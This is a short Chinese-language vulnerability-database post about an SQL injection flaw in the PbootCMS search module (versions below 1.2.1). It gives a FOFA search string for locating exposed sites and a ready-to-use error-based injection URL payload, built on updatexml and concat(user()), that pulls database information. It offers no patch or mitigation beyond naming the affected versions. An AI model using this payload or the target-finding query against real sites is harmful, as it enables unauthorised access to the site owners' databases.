PbootCMS search SQL注入漏洞

棉花糖

7月27日发布

0230

# PbootCMS search SQL注入漏洞

## 漏洞描述

PbootCMS 搜索模块存在SQL注入漏洞。通过漏洞可获取数据库敏感信息

## 漏洞影响

> [!NOTE]
>
> PbootCMS < 1.2.1 ## FOFA > [!NOTE]
>
> app=”PBOOTCMS”

## 漏洞复现

搜索框页面为

Payload为

“`
/index.php/Search/index?keyword=123&updatexml(1,concat(0x7e,user(),0x7e),1));%23=123](http://127.0.0.1/PbootCMS/index.php/Search/index?keyword=123&updatexml(1,concat(0x7e,user(),0x7e),1));%23=123)
“`

文章版权归作者所有，未经允许请勿转载。

THE END

国内漏洞库

喜欢就支持一下吧

请登录后发表评论

登录注册

请登录后查看评论内容

PbootCMS search SQL注入漏洞

请登录后发表评论

1新增沉浸式翻译插件deepl pro api共享

2用友NC-Cloud process SQL注入

3HertzBeat(赫兹跳动) 开源实时监控系统默认口令

4顺景ERP GetFile任意文件读取

5中成科信票务管理系统UploadHandler.ashx任意文件上传

6【投稿】Linux应急响应and安全加固

PbootCMS search SQL注入漏洞

请登录后发表评论

1新增沉浸式翻译插件deepl pro api共享

2用友NC-Cloud process SQL注入

3HertzBeat(赫兹跳动) 开源实时监控系统 默认口令

4顺景ERP GetFile任意文件读取

5中成科信票务管理系统UploadHandler.ashx任意文件上传

6【投稿】Linux应急响应and安全加固

3HertzBeat(赫兹跳动) 开源实时监控系统默认口令